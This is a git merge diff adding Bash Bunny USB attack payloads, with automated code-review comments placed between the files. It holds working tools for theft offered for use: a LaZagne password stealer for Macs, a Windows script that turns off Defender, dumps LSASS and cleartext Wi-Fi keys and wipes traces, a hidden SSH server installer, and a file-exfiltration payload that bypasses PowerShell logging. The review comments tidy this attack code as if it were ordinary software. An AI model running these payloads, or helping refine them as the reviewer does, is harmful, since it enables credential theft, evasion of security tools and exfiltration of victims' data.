Merge branch 'hak5:master' into master
commit
d9bdd824f1
|
@ -0,0 +1,238 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
# !/usr/bin/python
|
||||
|
||||
##############################################################################
|
||||
# #
|
||||
# By Alessandro ZANNI #
|
||||
# #
|
||||
##############################################################################
|
||||
|
||||
# Disclaimer: Do Not Use this program for illegal purposes ;)
|
||||
|
||||
import argparse
|
||||
import logging
|
||||
import sys
|
||||
import os
|
||||
import time
|
||||
|
||||
# Configuration
|
||||
from lazagne.config.write_output import write_in_file, StandardOutput
|
||||
from lazagne.config.manage_modules import get_categories
|
||||
from lazagne.config.constant import constant
|
||||
from lazagne.config.run import run_lazagne, create_module_dic
|
||||
|
||||
|
||||
# Object used to manage the output / write functions (cf write_output file)
|
||||
constant.st = StandardOutput()
|
||||
modules = create_module_dic()
|
||||
|
||||
|
||||
def output(output_dir=None, txt_format=False, json_format=False, all_format=False):
|
||||
if output_dir:
|
||||
if os.path.isdir(output_dir):
|
||||
constant.folder_name = output_dir
|
||||
else:
|
||||
print('[!] Specify a directory, not a file !')
|
||||
|
||||
if txt_format:
|
||||
constant.output = 'txt'
|
||||
|
||||
if json_format:
|
||||
constant.output = 'json'
|
||||
|
||||
if all_format:
|
||||
constant.output = 'all'
|
||||
|
||||
if constant.output:
|
||||
if not os.path.exists(constant.folder_name):
|
||||
os.makedirs(constant.folder_name)
|
||||
# constant.file_name_results = 'credentials' # let the choice of the name to the user
|
||||
|
||||
if constant.output != 'json':
|
||||
constant.st.write_header()
|
||||
|
||||
|
||||
def quiet_mode(is_quiet_mode=False):
|
||||
if is_quiet_mode:
|
||||
constant.quiet_mode = True
|
||||
|
||||
|
||||
def verbosity(verbose=0):
|
||||
# Write on the console + debug file
|
||||
if verbose == 0:
|
||||
level = logging.CRITICAL
|
||||
elif verbose == 1:
|
||||
level = logging.INFO
|
||||
elif verbose >= 2:
|
||||
level = logging.DEBUG
|
||||
|
||||
formatter = logging.Formatter(fmt='%(message)s')
|
||||
stream = logging.StreamHandler(sys.stdout)
|
||||
stream.setFormatter(formatter)
|
||||
root = logging.getLogger()
|
||||
root.setLevel(level)
|
||||
# If other logging are set
|
||||
for r in root.handlers:
|
||||
r.setLevel(logging.CRITICAL)
|
||||
root.addHandler(stream)
|
||||
|
||||
|
||||
def manage_advanced_options(user_password=None, dictionary_attack=None):
|
||||
if user_password:
|
||||
constant.user_password = user_password
|
||||
|
||||
if dictionary_attack:
|
||||
constant.dictionary_attack = dictionary_attack
|
||||
|
||||
|
||||
def clean_args(arg):
|
||||
"""
|
||||
Remove not necessary values to get only subcategories
|
||||
"""
|
||||
for i in ['output', 'write_normal', 'write_json', 'write_all', 'verbose', 'auditType', 'quiet']:
|
||||
try:
|
||||
del arg[i]
|
||||
except Exception:
|
||||
pass
|
||||
return arg
|
||||
|
||||
|
||||
def runLaZagne(category_selected='all', subcategories={}, password=None, interactive=False):
|
||||
"""
|
||||
This function will be removed, still there for compatibility with other tools
|
||||
Everything is on the config/run.py file
|
||||
"""
|
||||
for pwd_dic in run_lazagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=password,
|
||||
interactive=interactive
|
||||
):
|
||||
yield pwd_dic
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
parser = argparse.ArgumentParser(description=constant.st.banner, formatter_class=argparse.RawTextHelpFormatter)
|
||||
parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION),
|
||||
help='laZagne version')
|
||||
|
||||
# ------------------------------------------- Permanent options ------------------------------------------
|
||||
# Version and verbosity
|
||||
PPoptional = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PPoptional._optionals.title = 'optional arguments'
|
||||
PPoptional.add_argument('-i', '--interactive', default=False, action='store_true',
|
||||
help='will prompt a window to the user')
|
||||
PPoptional.add_argument('-password', dest='password', action='store',
|
||||
help='user password used to decrypt the keychain')
|
||||
PPoptional.add_argument('-attack', dest='attack', action='store_true',
|
||||
help='500 well known passwords used to check the user hash (could take a while)')
|
||||
PPoptional.add_argument('-v', dest='verbose', action='count', help='increase verbosity level', default=0)
|
||||
PPoptional.add_argument('-quiet', dest='quiet', action='store_true',
|
||||
help='quiet mode: nothing is printed to the output', default=False, )
|
||||
|
||||
# Output
|
||||
PWrite = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PWrite._optionals.title = 'Output'
|
||||
PWrite.add_argument('-oN', dest='write_normal', action='store_true', help='output file in a readable format')
|
||||
PWrite.add_argument('-oJ', dest='write_json', action='store_true', help='output file in a json format')
|
||||
PWrite.add_argument('-oA', dest='write_all', action='store_true', help='output file in all format')
|
||||
PWrite.add_argument('-output', dest='output', action='store', help='destination path to store results (default:.)',
|
||||
default='.')
|
||||
|
||||
# -------------------------------- Add options and suboptions to all modules ------------------------------
|
||||
all_subparser = []
|
||||
categories = get_categories()
|
||||
for c in categories:
|
||||
categories[c]['parser'] = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
categories[c]['parser']._optionals.title = categories[c]['help']
|
||||
|
||||
# Manage options
|
||||
categories[c]['subparser'] = []
|
||||
for module in modules[c]:
|
||||
m = modules[c][module]
|
||||
categories[c]['parser'].add_argument(m.options['command'], action=m.options['action'], dest=m.options['dest'],
|
||||
help=m.options['help'])
|
||||
|
||||
# Manage all sub options by modules
|
||||
if m.suboptions:
|
||||
tmp = []
|
||||
for sub in m.suboptions:
|
||||
tmp_subparser = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
tmp_subparser._optionals.title = sub['title']
|
||||
if 'type' in sub:
|
||||
tmp_subparser.add_argument(sub['command'], type=sub['type'], action=sub['action'],
|
||||
dest=sub['dest'], help=sub['help'])
|
||||
else:
|
||||
tmp_subparser.add_argument(sub['command'], action=sub['action'], dest=sub['dest'],
|
||||
help=sub['help'])
|
||||
tmp.append(tmp_subparser)
|
||||
all_subparser.append(tmp_subparser)
|
||||
categories[c]['subparser'] += tmp
|
||||
|
||||
# ------------------------------------------- Print all -------------------------------------------
|
||||
parents = [PPoptional] + all_subparser + [PWrite]
|
||||
dic = {'all': {'parents': parents, 'help': 'Run all modules'}}
|
||||
for c in categories:
|
||||
parser_tab = [PPoptional, categories[c]['parser']]
|
||||
if 'subparser' in categories[c]:
|
||||
if categories[c]['subparser']:
|
||||
parser_tab += categories[c]['subparser']
|
||||
parser_tab += [PWrite]
|
||||
dic_tmp = {c: {'parents': parser_tab, 'help': 'Run %s module' % c}}
|
||||
dic = dict(list(dic.items()) + list(dic_tmp.items()))
|
||||
|
||||
subparsers = parser.add_subparsers(help='Choose a main command')
|
||||
for d in dic:
|
||||
subparsers.add_parser(d, parents=dic[d]['parents'], help=dic[d]['help']).set_defaults(auditType=d)
|
||||
|
||||
# ------------------------------------------- Parse arguments -------------------------------------------
|
||||
|
||||
if len(sys.argv) == 1:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = dict(parser.parse_args()._get_kwargs())
|
||||
arguments = parser.parse_args()
|
||||
|
||||
# Define constant variables
|
||||
output(
|
||||
output_dir=args['output'],
|
||||
txt_format=args['write_normal'],
|
||||
json_format=args['write_json'],
|
||||
all_format=args['write_all']
|
||||
)
|
||||
verbosity(verbose=args['verbose'])
|
||||
manage_advanced_options(user_password=args.get('password', None), dictionary_attack=args.get('attack', None))
|
||||
quiet_mode(is_quiet_mode=args['quiet'])
|
||||
|
||||
# Print the title
|
||||
constant.st.first_title()
|
||||
|
||||
start_time = time.time()
|
||||
|
||||
category_selected = args['auditType']
|
||||
subcategories = clean_args(args)
|
||||
|
||||
for r in runLaZagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=args.get('password', None),
|
||||
interactive=arguments.interactive
|
||||
):
|
||||
pass
|
||||
|
||||
write_in_file(constant.stdout_result)
|
||||
constant.st.print_footer(elapsed_time=str(time.time() - start_time))
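Review bot: `runLaZagne` declares `subcategories={}` — a mutable default that is created once and shared by every call, so anything the callee stores in it would leak into later calls; the idiomatic form is `subcategories=None` with `subcategories = {} if subcategories is None else subcategories` as the first statement of the body. In the same file, `clean_args` wraps `del arg[i]` in `except Exception: pass`, although only `KeyError` is expected for a key that is absent; `except KeyError: pass` keeps unrelated failures visible. The `# !/usr/bin/python` line is not a usable shebang (it is not the first line of the file and has a space after `#`), so it is dead text and can be dropped or moved to line 1 as `#!/usr/bin/env python`.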
|
|
@ -0,0 +1,44 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Mac Password Grabber
|
||||
# Author: Overtimedev
|
||||
# Version: 1.0
|
||||
#
|
||||
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass
|
||||
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
|
||||
#
|
||||
# Amber..............Executing payload
|
||||
# Green..............Finished
|
||||
#
|
||||
|
||||
LED G R
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
lootdir=loot/MacPass
|
||||
mkdir -p /root/udisk/$lootdir
|
||||
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING cd /Volumes/BashBunny/
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING python get-pip.py
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING pip install -r requirements.txt
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
|
||||
QUACK ENTER
|
||||
QUACK DELAY 10000
|
||||
QUACK STRING killall Terminal
|
||||
QUACK ENTER
|
||||
|
||||
# Sync filesystem
|
||||
sync
|
||||
|
||||
# Green LED for finished
|
||||
LED G
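Review bot: The header comment `# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)` is garbled — the leading `s(` reads as a paste remnant and "vicims" is a typo — so the one step an operator must perform before use is the hardest line to read; dropping the stray `s(` and fixing the spelling is enough. The README in this merge repeats the same typo in its step 3.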
|
|
@ -0,0 +1,25 @@
|
|||
# Mac Password Grabber for the BashBunny
|
||||
|
||||
* Author: Overtimedev
|
||||
* Version: Version 1.0
|
||||
* Target: OSX
|
||||
|
||||
## Description
|
||||
|
||||
Steals Mac Passwords using laZagne.py then stashes them in /loot/MacPass
|
||||
|
||||
|
||||
|
||||
1. put get-pip.py, laZagne.py and requirements.txt in the root folder of the bunny
|
||||
|
||||
2. unzip lazagne.zip into the root folder of the bunny
|
||||
|
||||
3. Replace PASSWORD, with your vicims mac computer password in payload.txt
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Amber | Executin Payload |
|
||||
| Green | Attack Finished |
|
|
@ -0,0 +1,8 @@
|
|||
psutil; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
secretstorage; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
pyasn1
|
||||
enum34; python_version < '3.4' and sys_platform == 'win32'
|
||||
rsa; sys_platform == 'win32'
|
||||
https://github.com/AlessandroZ/pypykatz/archive/master.zip; python_version < '3.4' and sys_platform == 'win32'
|
||||
https://github.com/skelsec/pypykatz/archive/master.zip; python_version > '3.5' and sys_platform == 'win32'
|
||||
pycryptodome
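Review bot: The two `pypykatz` entries are installed straight from `archive/master.zip` URLs, so whatever the branch head contains at install time is what gets installed — there is no tag, commit or `--hash=` pin, which is the usual supply-chain exposure of direct-URL requirements; pointing the URL at a release tag or commit and adding a `--hash=` line (or using a pinned PyPI release if one is suitable) removes it. The environment markers `python_version < '3.4'` and `python_version > '3.5'` also leave Python 3.4 and 3.5 on win32 with neither entry; if that gap is intentional, a comment saying so would help the next reader.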
|
|
@ -0,0 +1,38 @@
|
|||
DELAY 5000
|
||||
GUI d
|
||||
DELAY 1200
|
||||
GUI r
|
||||
DELAY 1200
|
||||
STRING powershell -nologo -noni -ep bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 2000
|
||||
LEFT
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING mode con:cols=100 lines=1
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING $usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name; powershell -nologo -noni -ep bypass -File $usb\payloads\switch1\run.ps1
|
||||
ENTER
|
||||
DELAY 35000
|
||||
STRING function eject {$driveEject = New-Object -comObject Shell.Application;$driveEject.Namespace(17).ParseName("$usb").InvokeVerb("Eject")}
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING echo "Successful PWNd..."
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING eject
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING Set-MpPreference -DisableRealtimeMonitoring $false
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING exit
|
||||
ENTER
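Review bot: This Ducky Script file and the bash payload that invokes it via `QUACK switch1/duck_code.txt` carry no header block, unlike the other payloads in this merge, which open with `# Title:`, `# Author:`, `# Version:`, `# Category:` and `# Target:` lines; the bash payload's LED states (`LED SETUP`, `LED ATTACK`, `LED R B`, `LED FINISH`, `LED G`) are likewise undocumented. Adding the same header to the bash payload and a short `REM` description at the top of the Ducky file would bring both files in line with the repository's convention.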
|
|
@ -0,0 +1,9 @@
|
|||
#!/bin/bash
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID VID_0X0D8C PID_0X0012
|
||||
LED ATTACK
|
||||
LED R B
|
||||
QUACK switch1/duck_code.txt
|
||||
sync;sleep 1;sync
|
||||
LED FINISH
|
||||
LED G
|
|
@ -0,0 +1,159 @@
|
|||
## ##
|
||||
## Ducked script by scaery v.1.0 ##
|
||||
## ________ __ .___ ##
|
||||
## \______ \ __ __ ____ | | __ ____ __| _/ ##
|
||||
## | | \| | \_/ ___\| |/ // __ \ / __ | ##
|
||||
## | ` \ | /\ \___| <\ ___// /_/ | ##
|
||||
## /_______ /____/ \___ >__|_ \\___ >____ | ##
|
||||
## \/ \/ \/ \/ \/ ##
|
||||
## ##
|
||||
## Windows Enumeration - LSASS Dump - Wifi Credential Dumper ##
|
||||
## ##
|
||||
####################################################################
|
||||
|
||||
$switch = "switch1"
|
||||
$usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name
|
||||
$usb_loot = "loot\"
|
||||
$date = Get-Date -UFormat "%Y-%m-%d-%H-%M"
|
||||
$loot = $usb + $usb_loot + $env:computername + "_" + $date
|
||||
$usb_create = New-Item -ItemType directory $loot
|
||||
$proc = "$usb\payloads\$switch\procdump.txt"
|
||||
$proc_decode = certutil -decode $proc exec.exe
|
||||
$procdump = "$usb\payloads\$switch\exec.exe"
|
||||
$proc_run = cmd.exe /c exec.exe -ma lsass.exe -accepteula "$loot\$date-lsass.$env:computername.dmp"
|
||||
$wifi = (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Out-File $loot\$date-wifidump.log
|
||||
|
||||
$lines="------------------------------------------"
|
||||
function whost($a) {
|
||||
Write-Host
|
||||
Write-Host -ForegroundColor Green $lines
|
||||
Write-Host -ForegroundColor Green " "$a
|
||||
Write-Host -ForegroundColor Green $lines
|
||||
}
|
||||
|
||||
whost "Windows Enumeration Script v 0.1
|
||||
original by absolomb
|
||||
modified by scaery
|
||||
!!!!!!!!!"
|
||||
|
||||
$commands = [ordered]@{
|
||||
'Basic System Information' = 'Start-Process "systeminfo" -NoNewWindow -Wait';
|
||||
'Environment Variables' = 'Get-ChildItem Env: | ft Key,Value';
|
||||
'Network Information' = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
|
||||
'DNS Servers' = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
|
||||
'ARP cache' = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
|
||||
'Routing Table' = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
|
||||
'Network Connections' = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
|
||||
'Connected Drives' = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
|
||||
'Firewall Config' = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
|
||||
'Current User' = 'Write-Host $env:UserDomain\$env:UserName';
|
||||
'User Privileges' = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
|
||||
'Local Users' = 'Get-LocalUser | ft Name,Enabled,LastLogon';
|
||||
'Logged in Users' = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft';
|
||||
'Credential Manager' = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
|
||||
'User Autologon Registry Items' = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
|
||||
'Local Groups' = 'Get-LocalGroup | ft Name';
|
||||
'Local Administrators EN' = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
|
||||
'Local Administrators DE' = 'Get-LocalGroupMember Administratoren | ft Name, PrincipalSource';
|
||||
'User Directories' = 'Get-ChildItem C:\Users | ft Name';
|
||||
'Searching for SAM backup files' = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
|
||||
'Running Processes' = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
|
||||
'Installed Software Directories' = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
|
||||
'Software in Registry' = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
|
||||
'Folders with Everyone Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
|
||||
'Folders with BUILTIN\User Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
|
||||
'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
|
||||
'Unquoted Service Paths' = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
|
||||
'Scheduled Tasks' = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
|
||||
'Tasks Folder' = 'Get-ChildItem C:\Windows\Tasks | ft';
|
||||
'Startup Commands' = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
|
||||
}
|
||||
|
||||
function RunCommands($commands) {
|
||||
ForEach ($command in $commands.GetEnumerator()) {
|
||||
whost $command.Name
|
||||
Invoke-Expression $command.Value
|
||||
}
|
||||
}
|
||||
|
||||
# Disable Notifications
|
||||
|
||||
New-Item HKCU:\Software\Policies\Microsoft\Windows\Explorer -Force
|
||||
$registryPath1 = "HKCU:\Software\Policies\Microsoft\Windows\Explorer"
|
||||
$Name1 = "DisableNotificationCenter"
|
||||
$value1 = "00000001"
|
||||
IF(!(Test-Path $registryPath1)) {
|
||||
New-Item -Path $registryPath1 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance -Force
|
||||
$registryPath2 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance"
|
||||
$Name2 = "Enabled"
|
||||
$value2 = "00000000"
|
||||
IF(!(Test-Path $registryPath2)) {
|
||||
New-Item -Path $registryPath2 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel -Force
|
||||
$registryPath3 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel"
|
||||
$Name3 = "Enabled"
|
||||
$value3 = "00000000"
|
||||
IF(!(Test-Path $registryPath3)) {
|
||||
New-Item -Path $registryPath3 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay -Force
|
||||
$registryPath4 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay"
|
||||
$Name4 = "Enabled"
|
||||
$value4 = "00000000"
|
||||
IF(!(Test-Path $registryPath4)) {
|
||||
New-Item -Path $registryPath4 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
$notify_disable={
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0
|
||||
}
|
||||
$notify_enable={
|
||||
Remove-Item $registryPath1 -Force | Out-Null
|
||||
Remove-Item $registryPath2 -Force | Out-Null
|
||||
Remove-Item $registryPath3 -Force | Out-Null
|
||||
Remove-Item $registryPath4 -Force | Out-Null
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 1
|
||||
}
|
||||
|
||||
##################### EXECUTION STEPS ######################################
|
||||
|
||||
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
|
||||
|
||||
Invoke-Command -Scriptblock $notify_disable
|
||||
|
||||
RunCommands($commands) > $loot\$date-winenum.log
|
||||
|
||||
whost "Procdump LSASS! AV-free! Caution: Not Defender aware!"
|
||||
$proc_run
|
||||
|
||||
whost "Dumping Wifi Credentials to USB"
|
||||
$wifi
|
||||
|
||||
whost "Hiding traces and notifications"
|
||||
Invoke-Command -Scriptblock $notify_enable
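Review bot: `$proc_decode`, `$proc_run` and `$wifi` (lines `$proc_decode = certutil -decode $proc exec.exe`, `$proc_run = cmd.exe /c exec.exe ...`, `$wifi = (netsh wlan show profiles) | ...`) are evaluated at assignment, so all three actions run during variable setup near the top of the script; the later `whost "Procdump LSASS! ..."` / `$proc_run` and `whost "Dumping Wifi Credentials to USB"` / `$wifi` lines only echo output captured earlier, which misrepresents the execution order to a reader. `$notify_disable` and `$notify_enable` already use the deferred `{ ... }` plus `Invoke-Command -Scriptblock` shape, so using it for these three as well would make the EXECUTION STEPS section match what actually happens; `$procdump` is assigned and never read. Separately, `$notify_enable` calls `Remove-Item $registryPath1` on `HKCU:\Software\Policies\Microsoft\Windows\Explorer`, which deletes the whole policy key — including any values that existed before the script ran — rather than only the `DisableNotificationCenter` value it created; `Remove-ItemProperty -Path $registryPath1 -Name $Name1` limits the cleanup to what the script itself wrote, and the same applies to the three `Notifications\Settings` keys.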
|
|
@ -0,0 +1,27 @@
|
|||
# Title: Win SSH server
|
||||
# Description: Installs and runs a SSH Server on Windows.
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Target: Windows 10 Creators Update (Powershell 5.1+)
|
||||
# Attackmodes: HID
|
||||
# Requirements: Admin Privileges and an Online Connection
|
||||
# Notes: Add ` -StartupType 'Automatic'` after Start-Service to start ssh on boot
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID
|
||||
|
||||
LED ATTACK
|
||||
Q DELAY 200
|
||||
# Admin Powershell need Windows 10 Creators Update
|
||||
Q GUI x
|
||||
Q STRING a
|
||||
sleep 2
|
||||
# Q ALT y this work for EN y=yes
|
||||
# This works for all languages
|
||||
Q LEFT
|
||||
Q ENTER
|
||||
sleep 5
|
||||
Q STRING "Get-WindowsCapability -Online | ? Name -like 'OpenSSH.Server*' | ? State -EQ 'NotPresent' | % {Add-WindowsCapability -Online -Name \$_.Name}; Start-Service sshd"
|
||||
# Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,27 @@
|
|||
# SSH server
|
||||
- Author: Cribbit
|
||||
- Version: 1.0
|
||||
- Target: Windows 10 Creators Update (Powershell)
|
||||
- Category: Execution
|
||||
- Attackmode: HID
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | --------------- |
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Installs and runs a SSH Server on Windows.
|
||||
|
||||
## Notes
|
||||
This payload needs an admin powershell prompt and an internet connection to run.
|
||||
|
||||
## Configuration
|
||||
Add ` -StartupType 'Automatic'` after Start-Service to start ssh on boot.
|
||||
|
||||
## Colours
|
||||
| Status | Colour | Description |
|
||||
| -------- | ----------------------------- | --------------------------- |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISHED | Green blink followed by SOLID | Script is finished |
|
|
@ -0,0 +1,40 @@
|
|||
# Files Exfiltration with "SanDisk Wireless Stick"
|
||||
|
||||
- Title: "SanDisk Wireless Stick" Exfiltration
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Microsoft Windows 10
|
||||
- Category: Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
Uses the "SanDisk Wireless Stick" for files exfiltration.
|
||||
1) Avoids "PowerShell Script Block Logging".
|
||||
2) Hide "PowerShell" window.
|
||||
3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
|
||||
4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
|
||||
5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
|
||||
6) Exfiltration of the files via the HTTP channel.
|
||||
|
||||
## Configuration
|
||||
|
||||
In the web interface of the "SanDisk Wireless Stick" after update, change the following values :
|
||||
|
||||
![SanDisk-Configuration.png](./assets/SanDisk-Configuration.png)
|
||||
|
||||
From "payload.txt" change the values of the following constants :
|
||||
```bash
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
readonly SANDISK_SSID="HAK5-EXFIL"
|
||||
readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
|
||||
readonly SANDISK_LOOT="loots"
|
||||
readonly USER_DIRECTORY="~\\"
|
||||
readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
|
||||
|
||||
```
|
||||
|
||||
## Link
|
||||
[SanDisk Vendor](https://www.sandisk.com/goto/connect)
|
|
@ -0,0 +1,159 @@
|
|||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
#
|
||||
|
||||
param (
|
||||
[string] $SSID,
|
||||
[string] $PSK,
|
||||
[string] $LOOT,
|
||||
[string] $DIRECTORY,
|
||||
[string] $EXTENSION
|
||||
)
|
||||
|
||||
# Avoids "PowerShell Script Block Logging".
|
||||
#
|
||||
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
|
||||
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
|
||||
